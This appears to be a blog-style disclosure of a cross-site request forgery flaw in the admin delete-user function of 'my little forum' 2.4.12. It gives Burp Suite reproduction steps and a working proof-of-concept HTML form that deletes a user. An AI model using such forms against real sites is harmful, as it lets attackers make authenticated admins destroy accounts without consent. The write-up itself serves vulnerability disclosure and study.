CSRF- my little forum

CSRF- my little forum

The platform ‘my little forum’ is a web forum based on PHP and MySQL that displays messages in a threaded view.

Version Affected: 2.4.12

Vulnerability: Cross site request forgery

Description:Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. The affected version of the software is vulnerable to CSRF attack on delete user functionality of Admin.

Steps to reproduce:

  • Launch the application.
  • On the index page, login using the credentials created when registered, here logged in as admin/admin.
  • After logging in, while navigating through the site, the link to Admin page seemed interesting.
  • Whilst on the Admin page, we get to see a lot of functionalities like: Forum setting, User administration, pages etc.
  • Here User Administration seemed like a good option for targeting my little forum with cross site request forgery. So went forward with it. On the User Administration page, we see an option to Delete user (Here I had already created a test user).
  • Upon selecting a user out of the list of users, click on Delete Selected button, this will further take you other page confirming deletion of that user.
  • On this page, we will intercept this particular request using burp suite. In the intercepted request we see that there is no random token in the request this makes it vulnerable to CSRF.

  • For the above request we can craft a CSRF request with the help of below form.

The HTML code used to create the form:

<html>
<body>
<script>history.pushState(”, ”, ‘/’)</script>
<form action=”http://localhost:8888/mylittleforum/index.php” method=”POST”>
<input type=”hidden” name=”mode” value=”admin” />
<input type=”hidden” name=”selected&#95;confirmed&#91;&#93;” value=”4″ />
<input type=”hidden” name=”delete&#95;confirmed” value=”OK&#32;&#45;&#32;Delete” />
Test this :
<input type=”submit” value=”Submit request” />
</form>
</body>
</html>

  • After clicking on submit button below request is sent (crafted by us) and the user gets deleted succesfully

 

 

 

Leave a Reply

Your email address will not be published. Required fields are marked *